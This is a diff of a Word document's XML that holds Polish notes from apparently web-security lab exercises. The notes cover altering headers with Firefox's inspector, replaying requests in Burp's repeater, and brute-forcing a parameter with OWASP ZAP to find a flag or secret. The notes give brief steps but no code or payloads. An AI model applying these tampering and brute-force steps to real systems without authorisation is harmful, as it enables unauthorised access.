+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>odczytujemy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Modyfikacja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>żądań</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1174,31 +5740,222 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>firefoxem (opera nie działała) wysyłamy zmieniony nagłówek przez inspectora i szukamy flagi z odpowiedzią</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Powtarzanie żądania HTTP </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>firefoxem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (opera </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>nie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>działała</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wysyłamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zmieniony</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>nagłówek</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>przez</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>inspectora</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>szukamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>flagi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>odpowiedzią</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Powtarzanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>żądania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId31" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1222,46 +5979,455 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:t>(chyba z firefoxa wystarczy od razu jeden request zrobić)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a jak nie to odpalić burpa -&gt; załączyć proxy w firefoxie -&gt; wysłać żadanie -&gt; dodać w burpie przechwycone rządanie do repeatera</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tam jeszcze raz wysłać żądanie</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Wyszukiwanie właściwej wartości parametru metodą siłową </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId27" w:history="1">
+        <w:lastRenderedPageBreak/>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>chyba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>firefoxa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wystarczy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>od</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>razu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>jeden</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> request </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zrobić</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a jak </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>nie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>odpalić</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>burpa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>załączyć</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>firefoxie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wysłać</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>żadanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>dodać</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>burpie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>przechwycone</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>rządanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>repeatera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tam </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>jeszcze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>raz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wysłać</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>żądanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wyszukiwanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>właściwej</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wartości</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>parametru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodą</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>siłową</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -1278,11 +6444,215 @@
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>odpalamy OWASP -&gt; manual explorer -&gt; wklejamy url, odhaczamy ‘Enbable HUD’ i odpalamy -&gt; szukamy żądania z najmniejszym rozmiarem response body (1615b) i tam powinna być odpowiedź z secret</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>odpalamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OWASP -&gt; manual explorer -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>wklejamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>odhaczamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Enbable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HUD’ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>odpalamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>szukamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>żądania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>najmniejszym</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>rozmiarem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> response body (1615b) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tam </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>powinna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>być</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>odpowiedź</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> z secret</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1833,6 +7203,64 @@
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTML-wstpniesformatowany">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normalny"/>
+    <w:link w:val="HTML-wstpniesformatowanyZnak"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00850DE7"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
